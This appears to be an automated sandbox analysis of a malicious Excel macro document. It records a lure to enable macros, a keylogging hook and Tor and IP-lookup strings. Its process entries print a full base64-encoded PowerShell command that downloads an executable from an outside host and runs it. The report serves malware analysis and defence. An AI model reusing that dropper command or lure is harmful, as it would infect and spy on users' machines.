                      Source: powershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: tNDFx.exe, 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.live
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: tNDFx.exe, 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpString found in binary or memory: https://oMAWpB8PlZYBRN.org
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: tNDFx.exe, 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\tNDFx.exe

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Document image extraction number: 1Screenshot OCR: Enable Editing" form the yellow bar and then dick "Enable Content"
                      Source: Document image extraction number: 1Screenshot OCR: Enable Content"
                      Source: Document image extraction number: 3Screenshot OCR: Enable Editing" form the yellow bar and then dick "Enable Content"
                      Source: Document image extraction number: 3Screenshot OCR: Enable Content"
                      Document contains an embedded VBA macro which may execute processesShow sources
                      Source: MV TRIADES.xlsmOLE, VBA macro line: retval = Shell(sssssss)
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\tNDFx.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 6_2_001E9FDC NtSetInformationThread,
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 6_2_001EA7A0 NtSetInformationThread,
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00366230
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00365618
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_003668B8
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00365960
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036BD60
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_003621CF
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036C2A9
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00362389
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00366768
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_007D0898
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_007D0048
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00869098
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086D8A0
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00860048
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086B850
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_008685C0
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00869BC8
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086F510
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00863328
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00868210
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00863A50
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00866D98
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00865B10
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00869B28
                      Source: MV TRIADES.xlsmOLE, VBA macro line: Public Sub Workbook_Open()
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open
                      Source: MV TRIADES.xlsmOLE indicator, VBA macros: true
                      Source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb
                      Source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpBinary or memory string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSM@15/10@3/3
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MV TRIADES.xlsmJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0D5.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................x.............W.a.i.t.i.n.g. .f.o.r. .1.....l.......-t......................0...............H...............................
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............H.......J.......................
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................Ku......................e. .............H..........................s....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................xw......................e. .............H..........................s....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: MV TRIADES.xlsmVirustotal: Detection: 44%
                      Source: MV TRIADES.xlsmReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe'
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe'
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: MV TRIADES.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
                      Source: MV TRIADES.xlsmInitial sample: OLE zip file path = xl/media/image2.png
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: (PinLC:\Windows\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: Npdbsic.pdb source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4tNDFx.PDB424491E3931}\Servererver32 source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: bc.pdbCESSO source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp
                      Source: Binary string: @micC:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
                      Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdbX source: tNDFx.exe, 00000006.00000002.2134101883.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: @nptnVisualBasic.pdb\ source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2109637901.0000000002AB0000.00000002.00000001.sdmp
                      Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0x9FB74E9D [Sun Nov 29 18:42:37 2054 UTC]
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisWorkbook
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00361C15 push ebx; iretd
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\tNDFx.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
